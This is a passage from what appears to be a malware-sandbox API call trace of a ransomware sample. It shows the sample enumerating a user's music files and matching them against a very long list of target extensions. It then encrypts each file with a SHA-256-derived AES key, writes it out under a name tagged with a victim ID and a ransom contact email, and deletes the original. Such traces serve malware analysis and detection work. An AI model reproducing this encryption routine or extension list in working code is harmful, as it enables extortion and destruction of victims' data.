.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.046] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.046] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.046] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0191.075] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x41d9, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x41d9, lpOverlapped=0x0) returned 1
	[0191.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.078] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0191.081] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.081] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0191.081] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.082] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.082] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0191.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.082] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x41d9, dwBufLen=0x41d9 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x41e0) returned 1
	[0191.083] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.083] RtlMoveMemory (in: Destination=0xfe1368, Source=0xfdd180, Length=0x41d9 | out: Destination=0xfe1368) 
	[0191.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.084] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1368*, pdwDataLen=0x18aefc*=0x41d9, dwBufLen=0x41e0 | out: pbData=0xfe1368*, pdwDataLen=0x18aefc*=0x41e0) returned 1
	[0191.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.084] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0191.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.084] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0191.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.084] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0191.085] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.085] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.085] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0191.087] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0191.087] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.087] WriteFile (in: hFile=0x388, lpBuffer=0xfe1368*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe1368*, lpNumberOfBytesWritten=0x18b358*=0x41e0, lpOverlapped=0x0) returned 1
	[0191.091] CloseHandle (hObject=0x388) returned 1
	[0191.091] CloseHandle (hObject=0x2c0) returned 1
	[0191.091] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a")) returned 1
	[0191.095] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a")) returned 0
	[0191.095] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44ca9a40, ftCreationTime.dwHighDateTime=0x1d97232, ftLastAccessTime.dwLowDateTime=0x75d4c00, ftLastAccessTime.dwHighDateTime=0x1d97518, ftLastWriteTime.dwLowDateTime=0x75d4c00, ftLastWriteTime.dwHighDateTime=0x1d97518, nFileSizeHigh=0x0, nFileSizeLow=0x11341, dwReserved0=0x0, dwReserved1=0x0, cFileName="Um41JUEVtTvCC2z.mp3", cAlternateFileName="UM41JU~1.MP3")) returned 1
	[0191.095] lstrcmpW (lpString1="Um41JUEVtTvCC2z.mp3", lpString2="..") returned 1
	[0191.095] lstrcmpW (lpString1="Um41JUEVtTvCC2z.mp3", lpString2=".") returned 1
	[0191.095] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0191.095] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="Um41JUEVtTvCC2z.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\Um41JUEVtTvCC2z.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\Um41JUEVtTvCC2z.mp3"
	[0191.095] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\Um41JUEVtTvCC2z.mp3") returned 58
	[0191.095] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.096] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\Um41JUEVtTvCC2z.mp3", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3") returned 0x3a
	[0191.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.097] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.097] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3"
	[0191.097] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3") returned 58
	[0191.097] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.098] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0191.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.098] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.098] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.099] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.099] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0191.100] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x11341, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x11341, lpOverlapped=0x0) returned 1
	[0191.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.105] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0191.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.107] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0191.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.108] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.108] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95f0) returned 1
	[0191.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.108] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x11341, dwBufLen=0x11341 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x11350) returned 1
	[0191.110] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.111] RtlMoveMemory (in: Destination=0xfee4d0, Source=0xfdd180, Length=0x11341 | out: Destination=0xfee4d0) 
	[0191.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.111] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfee4d0*, pdwDataLen=0x18aefc*=0x11341, dwBufLen=0x11350 | out: pbData=0xfee4d0*, pdwDataLen=0x18aefc*=0x11350) returned 1
	[0191.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.111] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0191.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.115] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0191.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.115] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0191.115] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.116] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.116] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0191.118] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 100
	[0191.118] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.119] WriteFile (in: hFile=0x388, lpBuffer=0xfee4d0*, nNumberOfBytesToWrite=0x11350, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfee4d0*, lpNumberOfBytesWritten=0x18b358*=0x11350, lpOverlapped=0x0) returned 1
	[0191.125] CloseHandle (hObject=0x388) returned 1
	[0191.125] CloseHandle (hObject=0x2c0) returned 1
	[0191.125] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3")) returned 1
	[0191.134] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\um41juevttvcc2z.mp3")) returned 0
	[0191.135] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3101dba0, ftCreationTime.dwHighDateTime=0x1d96f5c, ftLastAccessTime.dwLowDateTime=0x9e9cc9c0, ftLastAccessTime.dwHighDateTime=0x1d96f81, ftLastWriteTime.dwLowDateTime=0x9e9cc9c0, ftLastWriteTime.dwHighDateTime=0x1d96f81, nFileSizeHigh=0x0, nFileSizeLow=0x13b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="v-rZbut.wav", cAlternateFileName="")) returned 1
	[0191.135] lstrcmpW (lpString1="v-rZbut.wav", lpString2="..") returned 1
	[0191.135] lstrcmpW (lpString1="v-rZbut.wav", lpString2=".") returned 1
	[0191.135] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0191.135] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="v-rZbut.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\v-rZbut.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\v-rZbut.wav"
	[0191.135] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\v-rZbut.wav") returned 50
	[0191.135] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.136] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\v-rZbut.wav", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav") returned 0x32
	[0191.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.136] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.136] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav"
	[0191.136] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav") returned 50
	[0191.136] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.137] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0191.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.137] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cd